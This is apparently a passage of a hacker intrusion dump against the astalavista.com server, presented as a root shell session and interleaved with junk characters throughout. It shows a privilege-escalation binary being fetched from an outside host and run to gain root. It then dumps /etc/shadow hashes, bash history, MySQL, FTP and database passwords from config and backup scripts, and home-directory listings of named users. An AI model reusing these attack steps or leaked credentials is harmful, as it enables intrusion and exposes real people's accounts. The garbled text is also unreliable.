" y+ ^7 _( {# f! F: M, \[~] plaintext passwords? yes,- i9 k# z% e& O1 K- W+ ?6 k8 z! a
Those so called “security professionals” who charge you $6.66 / month to# U! g# Y- [; _' ?7 Y$ c
register at their hack-proof portal, save your passwords in plaintext…
; i, i0 {" l  o# G* Wbrilliant!) P8 f; t# R! h& s/ ?/ T
0 s: b6 x. w- P- z7 g, A* ]
[~] This been fun but we want more.
+ \3 C6 E/ k" L' {) `6 |- t- ]7 s# u3 r- a' [  a9 \  z8 K6 N* d1 ]
sh-3.2$ uname -a
: R7 K) r4 W! ]' J  }Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux; u% M6 ^1 C  G# I
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
3 X. k! O% O# x, I–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]* ^) J9 x' W5 }& B0 ~6 J
Resolving anti.sec.labs… 13.33.33.374 ^- K  a/ t1 d7 I
Connecting to anti.sec.labs|13.33.33.37|:80… connected.0 Z  j" [9 Z; b( w4 s3 K$ n
HTTP request sent, awaiting response… 200 OK9 U! F% G3 t) D- l, d3 c
Length: 18200 (18K) [text/plain]+ W$ h. K7 E( Z% ]1 p: v8 X9 s
Saving to: `g0troot’! z( S- f# x) |/ x) |& B

5 y- Z) Y2 e) l+ C" a" O100%[=========================================================================================================================================>] 18,200      58.6K/s   in8 u: x) T& O8 d
0.3s
+ b& _9 ?$ |, u, t, F+ C% S
7 j( c% ^  f; q8 b$ E- R; p18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]( o/ J- z. ~& u0 a* p3 D
& O8 Y5 q' ]0 Y1 n/ c
sh-3.2$ ./g0troot -i x86_64
7 [" ]$ B# }: k; R( O; O2 c8 W; x[+] g0troot - anti.sec.labs8 T3 m6 i1 i, {; M, s
[+] Target: 2.6.18-128.1.10.el5+ S$ ~9 ^8 N- N
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]5 S; ~& i! v# E

: D- @$ v8 I. o4 f2 j[+] r00tr00t
3 h& m3 e: z- K[~] Executing shell…
6 q2 m/ I2 F* q. i& e( }; A! @3 c9 `! P! [1 q
sh-3.2# id  P8 Y0 f% [& P$ t
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
' L8 O$ Z3 l8 t2 b* o/ X& T! x3 Z
! h& b& t! u8 g4 g9 p; _sh-3.2# cat /etc/shadow
" i- D, z/ y! {3 Troot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::0 ^- D( r9 G- R8 ^: ^/ S
[snip]% O  N8 ~1 S  W
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::9 w8 B8 N) M5 f
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
2 n" N! B" R( ]com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
: R5 [# w% l- j" G8 q6 |# V- d; k/ t% hastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::/ ?  l1 J) C: g
( [) E3 C4 @2 X/ v6 r8 ]) r
sh-3.2# cat /etc/motd
4 B' g  R5 S( I/ t6 |8 d6 H#####################################################
8 _$ u% y( J6 M" u  i#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
/ y4 p& n, q: ~: I5 C% ~4 Z# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #: t/ G: w9 Z$ x8 v+ f
# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
; E; z* {0 h" R8 w/ l, a, I  O#                                                   #
' c. Y2 X% v4 o#####################################################7 I+ P1 q, j) w
#                                                   #
! D6 g# P) x1 `/ v' b1 b# Admin Contact - 链接标记support@secureservertech.com      #
( ~, _* s. t" {6 e# ?% G#                                                   #+ `7 N8 o9 c6 m# K
# Available ShortCuts                               #% ^7 S/ ]6 @5 U
#                                                   #1 U2 d* t5 |" \6 Y' R6 e
# nst -  list active connections                    #) f1 s% B! ~8 B: m) g7 M  G
# ddos - shows how many times each ip is connected  #
$ u& ~: j6 O+ F4 g/ A# ltr -  restart the webserver                      #; t  j' R) K' @# Y# Q7 L* d
# phpc - edit the php config file                   #
; V, ~& Y% e( ~# htc -  edit the webserver configuration file      #
6 m9 a1 O1 p3 n( v6 H# up -   uptime                                     #7 i# L1 S, e* c. @- R$ h
# etd - edit the motd of the day file               #. V6 X. Q% T% A9 u) y
# htr - start and restart apache if needed          #
: E8 y+ r- E; b6 C: b# syng - shows active SYN_RECV connections          #6 B+ s( K( _2 A' l
# synd - syn flood blocker - “synd -h” for usage    #
0 j3 @8 w+ \* B0 O#####################################################* l6 ^4 ^  R, M  N6 v0 G
# NOTES:                                            #% v' W7 w  u; [: f4 I
# Last Upgrade - 12-08-2008 by JF                   #
- k1 i! g. S  a6 D+ R# My.cnf/Mysql Optimization - 1-28-09               #
! c9 A7 ?  A8 C: U9 ]#                                                   ## d9 a2 ^, o! f- r$ ?) b
#                                                   #
' Q7 O0 m6 g; b0 m9 h#                                                   #1 r3 i* a' P1 ^; n
#####################################################
% u: K9 C8 ^6 W# s  q
4 X& H7 e- S- P  r8 O, osh-3.2# lastlog | grep -v Never
. L7 J$ [$ X9 S, P/ A/ Y! a8 _Username         Port     From             Latest
1 ]3 T! _% s$ N$ o" V' ~% Troot             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
0 P  X' j! |" u: O$ B3 h- E# r' Z5 O! Cadmin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
9 U8 w2 v/ S' r$ p' e3 Tcom              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
9 K: N6 e  |) o/ b8 l5 u* ^astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009/ l" ~$ F+ R5 s

$ o# P: q' A  `7 ^6 n1 |1 F5 Y. csh-3.2# ls -la3 y- U7 ?3 f, p
total 453376
7 G0 O$ l2 g* y$ Adrwxr-x— 15 root root       4096 Jun  4 08:40 .
  [/ o' ?7 d2 ^6 u+ o5 Sdrwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
4 Q+ U# N% W! o0 V; u9 N" s-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip
* H8 _* X6 I0 G5 O( H' g-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
5 ~- D; W: z3 L! h' d8 E' U4 X-rw——-  1 root root      16836 Jun  4 07:21 .bash_history
1 N6 t0 v, \' B4 d" C: A-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout0 e5 N" c# f' p0 C8 U- A; \, `
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile) R& d/ J& j1 A
-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
, ?) Q' X2 ~' Z* }" X5 D-rwx——  1 root root       1899 Oct 28  2007 bk.sh
3 E/ G) C. g. Q" Y" C) a-rw-r–r–  1 root root       1327 Nov 29  2007 cert
; ^. g( B0 [9 l  ]2 e7 X* @- O-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
  s+ ^4 o' t' x, vdrwxr-xr-x  4 root root       4096 May 20  2008 .cpan
9 \/ w! k) \  ^" D9 A-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
* C. w8 ^5 @/ f# H1 X7 Y-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql. d' ]' _- Y, i2 d5 {. N
drwx——  2 root root       4096 Oct 28  2007 .elinks
/ V* E& c+ ^5 B( F( r5 Udrwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1% z5 q; ]" G5 m$ b9 p) i
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2) c% S" V$ Z* K9 Z
-rw——-  1 root root          0 Apr 16 13:19 .history5 w. m% |/ ?" |) A5 Y- U
-rw-r–r–  1 root root      16095 Sep 11  2007 install.log2 x- _! @& j0 J) b. o5 [0 `
-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog; f7 q$ M$ `9 `- t
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh: Y! R, h5 u5 I. h/ l, N
-rw——-  1 root root         35 Jun  2 14:23 .lesshst: ~: [! y0 c8 s0 v) I. K/ j
drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
$ E0 v3 [# Z% ^0 adrwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec5 r' ^7 J+ [+ N8 f
-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz' P/ P$ L$ y& R/ o% O1 i
-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2, O" l/ v$ j. Y9 f4 S
-rwx——  1 root root        760 Sep 18  2008 lp
8 ~" k, i5 j2 ^- S: n8 K4 Udrwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
4 c$ o/ {3 y" |1 T-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
( _' N. ~4 e. p-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.11 C2 w1 |$ y1 m* q
drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.97 t( |# d. y$ y( ^0 |8 U% S2 F
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
$ _2 v1 d7 V3 ]% u8 p4 j2 v& edrwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
) p+ k! E7 q% [; x8 B$ H-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz2 u/ }/ b7 @# @& v' y3 G
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh
1 A! E) E1 I9 K-rw——-  1 root root         41 Oct 19  2007 .my.cnf6 C+ b! ^6 s% a' w( ]: e3 _
-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history$ B& g* H# A0 W  u: z& f
-rwx——  1 root root      38873 Apr 16  2008 mysqlreport
+ q$ h% h/ c5 E/ B" S) ~. H-rw——-  1 root root         41 May 20  2008 .mytop9 I. e& Y9 \& {+ S! Z/ I
drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
$ K- O+ _6 b- ?" _4 x3 z8 C& E-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
+ [) K1 @# t" u# _6 _% l+ ydrwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
& r3 D0 j0 e: b- N8 g-rw——-  1 root root       1462 Sep 21  2007 opt.php
/ ?0 c2 z7 t- Z% d: h& n: n" q-rw-r–r–  1 root root       3371 Sep 22  2007 p" H  s! w9 h) }- b& G/ S7 W' a
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
. b: H. z1 M5 d* _7 x& p2 h-rw——-  1 root root       1024 Feb  3 21:32 .rnd# w$ W3 c! Q! J" Z
-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
2 P2 A& s  j' n9 \-rw-r–r–  1 root root        887 Nov 28  2007 server.key
$ o8 S% d3 Q: k, y6 Cdrwx——  2 root root       4096 Oct 10  2008 .ssh
+ l/ |" F* n  U5 |/ i-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat/ L% \4 ^8 ]. X) F+ y
-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
0 n! ^9 l) B& S4 J' G5 V-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip% c( ]4 ]: g: J: z
-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1( T7 K9 T* |0 R9 Q
drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp, k& l. u9 S7 ~3 l6 }+ U. ]
-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh
# ^" b* D& V' Z& `6 Ddrwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0; A& s  B+ o0 H+ h9 h& q
-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2; S# G+ K, B$ {# x. J
-rw——-  1 root root      12997 May 16  2008 .viminfo5 j$ }3 _) ^" S0 ^0 n9 `
/ c- h" y# W/ b9 c
sh-3.2# cat .bash_history
+ ^; ]5 I% O$ _" O[snip]" ^" |4 F4 c' X. l* K2 I9 M7 H
wget cp4sst.com/sstlinux.tar.gz
, F$ ~' G; [6 J6 gtar zxvf sstlinux.tar.gz8 I, u$ P5 x& |; Q! u
cd linux-2.6.27.10
9 o# h5 y4 `4 N2 Osh install.sh
& H& G- W, a- @1 Y" bmake bzImage ; make modules ; make modules_install ; make install8 p: L0 b7 B2 r5 u7 S2 P, p  o  g2 [
make clean
* p  l, W% Q, D5 A" l% _3 v! H& }service mysqld restart
8 V) J) ]0 [$ c6 N+ Y6 V8 W: C! X9 i% _+ M[snip]
2 W9 D3 X0 y$ H8 Y1 Q4 xcd /usr/sbin/
# c( O& f5 q0 t% h: \4 ?% Cchmod 4777 traceroute
1 p7 b' u, D& Z& u5 o% a+ C. H: kchmod 4777 ping- n' a8 h6 m8 I5 S% b6 |
traceroute -I 链接标记[url]www.astalavista.ch[/url]
, d' h, e9 b) m[snip]$ D  ^: C9 o0 M" d: I( M- z0 C
vi /etc/csf/csf.conf% Z! S, {" f. h
traceroute google.ch2 y* [( b( T( n" J4 W6 R0 q+ _% _! p
service csf restart
" u6 e/ c- i7 b2 T4 v! otracert google.ch. p, d( w- K+ d9 `
service csf restart
. L" p' F0 k9 u' G8 ?, {3 F+ ^8 Ftraceroute 链接标记[url]www.google.ch[/url]
# q8 I7 z1 s  P# q5 Utracert 链接标记[url]www.google.ch[/url]
) q1 q1 i8 b4 b/ _$ v. ~traceroute 链接标记[url]www.google.ch[/url]2 t; R8 o  o, @4 }0 P; G
locate traceroute" q+ ^. |, M+ [1 h/ M
chown 4755 /bin/traceroute" g) y, o" B! S" C) ?0 f
chown 4777 /bin/traceroute) L$ T) d3 N0 ]( F0 K2 e" s% ?
locate ping
# I; j; p! O" i# A. p2 `2 E; f0 Jchown 4755 /bin/ping
6 P7 c* ~8 t# b. cchown 4777 /bin/ping6 |& N! M9 t& h
cd /bin/6 E0 F5 }9 L1 {# p$ C1 O0 P& Y
ls -ali | grep ping
1 X4 ~0 j5 e. H5 Y+ ychown root ping' t4 m, E7 O  a! J& c. v8 s
chmod 4755 ping
, Z) k; @" g( v8 A5 \7 Vls -ali | grep traceroute
) j, @  x1 t6 j8 S; p( Y- ^& Cchown root traceroute6 I7 O5 J, m$ T% o  E
chmod 4755 traceroute2 v; w( A/ s& C1 h% w. P- B
ls -ali | grep traceroute3 m$ O9 \" k. S0 W( D
traceroute -I 链接标记[url]www.google.ch[/url]
" q# m. B1 U2 S1 D- }0 [( ttraceroute 链接标记[url]www.google.ch[/url]% _1 p5 k: i0 c
whois pmsantos.ch
0 e# n/ U* N8 f& p2 H$ k[snip]  \% y2 B# K2 O' R
mysql -h com_contrexx2_live < /root/defaultp_ports.sql2 n( k( K6 h, J& C
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql- Y' t6 l2 o! C+ G5 [, _2 {3 w
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql' |" C$ s: {7 {) G6 }0 S
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
) ~+ |5 ?: Y0 u$ }- t3 etop
& n4 A$ o- N; z: W* jping ssth.ch# l# ~  g( E& a9 Y( p# c. \
ping asdlkfaljgasd???ljg???lasj.ch6 f: X: M" S' R! X7 a2 z2 h1 o
ping asdlkfaljgasdlasj.ch4 R- [  d; b1 k. o: e9 i! _7 k
ping 链接标记[url]www.ssth.ch[/url]
+ W8 \/ _6 n1 Y( q* m% Xping ssth.ch
# b) ~* e7 S% Nnslookup 链接标记[url]www.google.ch[/url]
( E1 _) }( w4 D. {/ N- _) Xnslookup 链接标记[url]www.ssth.ch[/url]
) u# h/ I, P; l0 t* M: ~( f$ Pman nslookup
7 o: S5 U5 V! M3 {9 ~ping 链接标记[url]www.google.ch[/url]  m* n+ k5 I6 L/ R9 Y& g
nslookup 链接标记[url]www.google.ch[/url]
" A2 c  `, @" x9 T+ k2 H3 Gnslookup 链接标记[url]www.google.ch[/url]
0 r1 t: X8 E( [/ V3 e( gnslookup salfjasdlf.ch
, z* l6 K/ B4 W; D4 t8 D: E[snip]
. x8 o: w  Y3 b) Yopenssl passwd -1 sadf
, J- A2 q6 j/ O! Q1 eopenssl passwd -1 5cZNHstdTy- U- b7 _, [8 s: j3 l' A6 a1 [( E
mysql
9 Z* E" ~& u! l! v! |0 ^! Kmysql
% e' f4 S( ^2 ]; [: q" a9 O- ]: E8 Jlocate proftp
; a! X3 F* E) y. ], Evi /etc/proftpd.passwd6 @- }- M: V+ l- F
service proftpd restart, i& F4 \9 [$ W+ U" h4 |4 A2 G
locate proftpd.conf
( ~- z% o# z3 y5 ovi /etc/proftpd.conf+ I8 E; y3 s" h8 O2 t" s+ e
vi /etc/proftpd.passwd0 J7 L& N9 }8 [( C
service proftpd restart! W  c1 N9 K  X7 x. V% G
[snip]% N9 u% n& Z1 _$ U" T3 ^
/bin/sh /home/com/backup_system/backup.sh
7 j9 G3 u: P5 A4 ?3 Dtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin$ E  e2 `- C( y! L) h8 E
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
9 p( z+ N4 S+ J* emysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
9 g; P9 j" E6 Y! B( Y8 m5 Uls -ali* H6 h, v  X9 a3 e% T. ?% K/ S
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
0 C& b6 B) Z* E  w) jmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
1 o  G7 \# n1 l9 I6 Y0 n$ T+ |9 W7 xcrontab -l" T" n$ c& }; b8 O" a3 M+ w" C) M! v
crontab -l4 R* V% j7 e) X
php -q /home/com/public_html/modifications/cronjobs/securitynews.php# D6 n4 E6 j  ~: f
/home/com/public_html/modifications/cronjobs/exploits.sh* u0 {. o0 ]; K# P! _4 u2 n+ y
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
3 N0 f$ D/ F! i- `* s4 Y6 V  ctar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
, d' G3 R% ]/ U) r" v1 f/ \4 Lcd lsws-4.0.3, p8 U( b8 P" i3 H0 J( X
sh install.sh
; v/ y$ w1 {3 ?6 _uptime
0 ~0 N( ]" a$ N- d$ nhdparm -tt /dev/sda
* ?- {% Y1 @: N& I) F$ {iostat
7 i& o" ?# P6 p% tyum install iostat1 v! `, s# Y5 c
iostat1 y8 ]% ?$ [9 g7 r4 M
whereis iostat
: t) F$ P3 W. m" C& V" \0 T) m: Y% [yjm clean all7 r5 v4 Q0 _0 D6 y! p8 h9 i
yum clean all ; yum -y update( p4 w6 f: N. `& Q
iostat
3 G. k( C& ]* T$ y  gyum install systat
7 s  G2 N) X* brpm -qa | grep iostat! w3 g% ^8 S2 a4 O; [& {: ]
rpm -qa | grep sysstat
5 Q7 B! ]5 U% N) Grpm -qa | grep systat7 \. M' y6 b& e& }; h% P
dmesg -c
! A3 m# N( G7 U. Nsysctl -p
. a" X( o' H- n* v7 juname -r. _9 \& J9 W- y
cd /usr/src
: L$ Q7 f+ b7 Xwget nix101.com/kernels/sstlinux.tar.gz
" M4 q) l; @; }6 k6 }" E6 I  S+ b0 Bshutdown -r now
/ N/ K- `& e6 M7 q. {; c4 {8 mnano -w /boot/grub/grub.conf
* J5 J! m5 b; h& x4 K4 l
3 r) `  s: [' k! a* A3 g( Ksh-3.2# cat .my.cnf3 m" G* g2 D6 c* Y
[client]
: P4 D2 G' M4 i4 C# Ouser=da_admin5 z# Q0 P' t. o1 u5 e
password=X9dctmRH
0 D, Z" K) O3 h& V$ s. M, a1 S, e6 q  ?$ E8 Z5 H4 @
sh-3.2# cat /home/com/backup_system/backup.sh
, Q0 h. ^: D; `7 M7 l" K4 A+ c#!/bin/sh9 \& n$ U, T7 F: v* \0 a
#####################################################################' f% O% {# |: _5 g) |  @, W
#                                                                   ## h* |; E, \% N* C  E& z
#   incremental backup for astalavista.com                          #
! j9 i4 t4 G* k3 L6 k, I5 ^#                                                                   #7 O1 T3 [$ z3 e. }, [0 H' ~
#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #" B8 e2 v+ v! Y
#                                                                   #. N* y% y" l' G/ V4 V+ v
#####################################################################7 B) [1 U5 b2 \: V. C& {
[snip]
; j+ ?% E% g- T: S4 u$ m2 r  {, UPROG_DIR=”/home/com/backup_system”;
; L% ?- s4 r4 c3 k% fBACKUP_DIR=”/home/com/backups”;
7 y0 D0 ?* ]& i7 sDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
2 y# q) D9 N. g/ L$ B# ftp for synology backup server
) a# k" E" ?; j" C; {- }FTP_HOST=”212.254.194.163″;
/ C2 @- f6 g1 V; l4 _FTP_PORT=”21″;
+ R1 D" \( p0 \( i4 [3 K( \FTP_USER=”astalavista.com”;$ u* l2 ?2 }& S3 W; J; G: W- R
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;+ H0 @2 V9 k0 Z5 n
FTP_DIR=”/astalavista.com”;
5 v+ _7 K9 |# ?# k- t0 k# database, o8 Z. y1 C6 |% {
DB_HOST=”localhost”;. m2 X) _  v$ G, b2 K. A) L
DB_USER=”contrexxuser2″;" g/ Z0 [2 y5 D2 a7 ?7 j4 }* _
DB_PASS=”0fEYNZgXz1pKe”;1 E& M5 H5 ]1 J5 m
DB_DATABASE1=”com_contrexx2_live”;) k1 j. L" b! s9 G
DB_DATABASE2=”com_contrexx2″;2 q9 S% ]8 h3 [
[snip]
. ?% I2 x/ ~4 @; ?& Pftp -in $FTP_HOST $FTP_PORT <<EOF6 ~3 M) r3 w3 @& s  i+ u
quote USER $FTP_USER# o1 |: L2 U5 J& u+ F
quote PASS $FTP_PASS
+ _+ [0 F& n  Bcd $FTP_DIR
" s. x" E( a2 o2 n4 d: w, Xput $DB_FULLNAME-SQL_Dump.tar
* E9 O* N2 l* H- ?% Lput $BACKUP_FULLNAME-Public_HTML.tar
5 f) q" O5 E$ W9 s3 |close* H1 X, q$ Y8 v5 x
bye1 p+ e9 q8 M0 n* h8 P
EOF" T9 m) @4 I  k8 P
/ W# n# Q' n3 j! Q- p( G6 w! B
sh-3.2# cd /home
! P7 R. U' M2 Psh-3.2# ls -la
; @* }4 d5 E; U+ k% ptotal 1207 i0 V1 H1 g9 n3 u8 G8 d- q. i* l
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
- |' t( g) `$ Wdrwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..* _" |) P5 a- Q; i  Z
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin0 _* y+ @3 s: k0 ~% {
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
5 `2 Z4 `7 E5 F& [; m" p- b) T-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user9 Z/ h# G( q5 q2 W/ Q! S
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
% d, M8 Q% ~: C: p+ ddrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
0 P6 E% _' g9 y+ M& Ddrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
# P5 A; I% M9 J& E5 j: H0 Ddrwx–x–x 10 com     com      4096 Apr 28 12:40 com
( y1 L. b  F- b, }8 [drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
) h9 z- _* V& y& g: E% Tdrwx——  3 jon     jon      4096 Sep 21  2007 jon
& E+ d& X) }) q. R' D0 R$ T5 jdrwx——  2 root    root    16384 Sep 11  2007 lost+found
  `2 Y7 R/ _! W! e% Ydrwxr-xr-x  2 root    root     4096 Sep 14  2007 my
0 R- _0 s1 j3 y" D" a  B1 ldrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata9 y( O. Z$ i( K+ e1 z2 X
drwx——  2 jon     jon      4096 Sep 15  2007 test8 d2 p/ w  q3 D9 c
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp0 n, |! s! w4 l3 g3 X

' }. O% M, J$ S9 [8 H3 rsh-3.2# cd admin
# G8 C( o7 U* k( Ksh-3.2# ls -la
# g4 d' W: y  o' |" mtotal 1735896$ d$ z$ {; r$ p: w' ^( ^7 ]  H3 L' T
drwx–x–x  9 admin admin       4096 Nov 28  2007 .' j0 y7 {3 Z0 r0 y
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
6 e* S3 h+ z8 \0 G0 Hdrwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups7 G6 \% d$ q2 u! V; {; Z
drwx——  2 admin admin       4096 Sep 28  2007 backups
+ k* n" Q; D$ p0 M-rw——-  1 admin admin        860 Sep 17  2008 .bash_history
5 f* d, [7 F0 Z+ q! ?: m+ _-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout
2 [, f# z5 K% c; o* H9 s- a-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile( G; Y  _2 I+ B; V& C: l
-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc- M' G3 c% ~0 ^4 s- x
drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups* c5 M7 z. Q" j
drwx–x–x  6 admin admin       4096 Sep 21  2007 domains
% \, |& j. h6 O5 ]  Q  x. Sdrwxrwx—  3 admin mail        4096 Sep 21  2007 imap
- k* T: J, I' s-rw-r–r–  1 root  root          24 Sep 21  2007 info.php
. K# M( c6 k- E3 i# t) kdrwx——  2 admin admin       4096 Sep 21  2007 mail; g0 h4 w5 A( @1 t4 B9 _
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr
% |( c5 \4 L6 P8 H% ~-rw-r–r–  1 root  root         887 Nov 28  2007 server.key
9 B" k& m4 H. |" Q-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
' w4 y4 O* I* V( a" }+ @) o$ k-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz3 d1 r* E) ]2 H% }8 [* h8 Z2 F
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups" I  i, O- P0 \0 A. F4 ~/ r4 \
& U4 Y4 v) ^" j3 j3 u
sh-3.2# ..
2 [1 i5 a3 A% \# ~+ u% ]sh-3.2# cd jon5 V) H( C# U9 {- {
sh-3.2# ls -la! U9 R  p% [  q0 m7 g1 Y
total 36) b) T2 A; d- n6 w& e
drwx——  3 jon  jon  4096 Sep 21  2007 .& j) j# f1 B% o, E: d
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ... I  r( G3 D2 H' P, \
-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history
. I! W4 z7 p1 t, G" s-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout
  s5 k# b; V0 r' W, c5 k-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile
5 y+ H% `( c- g5 k7 O-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
) c+ N2 ~  {4 k$ n8 ^& q* |. i5 i-rw-r–r–  1 root root   24 Sep 21  2007 info.php' d) a* C2 x! {+ d( G8 f
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
! c7 P; f7 `1 m( P& Q4 }; a  P0 v3 c0 e* A7 [; @$ ]
sh-3.2# cd ..5 W; k! A) V1 f/ G  D; K6 X
sh-3.2# cd test
; w4 c8 `, O+ @" ~! x' v  tsh-3.2# ls -la
( x  A6 I* K$ J# V0 l4 c9 ktotal 48* e6 {4 H0 {' }- y! ?* s2 R+ y
drwx——  2 jon  jon  4096 Sep 15  2007 .. d2 u% d, f( |9 K
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 j8 z7 D* L, |% o4 s+ J-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history
0 c( r  \0 I# O2 R+ m" w9 N-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout' R, ?' K9 l8 f+ _  [7 j
-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile0 T7 [4 d9 S3 O, n. y
-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
( f- u! ?3 `! Wsh-3.2# cat .bash_history, w9 o2 t! T4 s) i
/usr/bin/mysqladmin -u root password PoliuJhytg67# ?2 E: G% L% X6 Z; h- v; A5 |
* Y- ]9 c- t  n2 [
sh-3.2# cd ..4 f1 Y7 |/ T& S8 C  |
sh-3.2# cd astanet
4 Q9 ?, |3 G" H9 R, J* f0 `- \sh-3.2# ls -la1 H4 }  N( J$ ?
total 520 P( k* R+ F' I0 m1 C2 h! M0 H
drwx–x–x  6 astanet astanet 4096 Jun  4 09:51 ." Y! V% }4 H3 J1 T
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
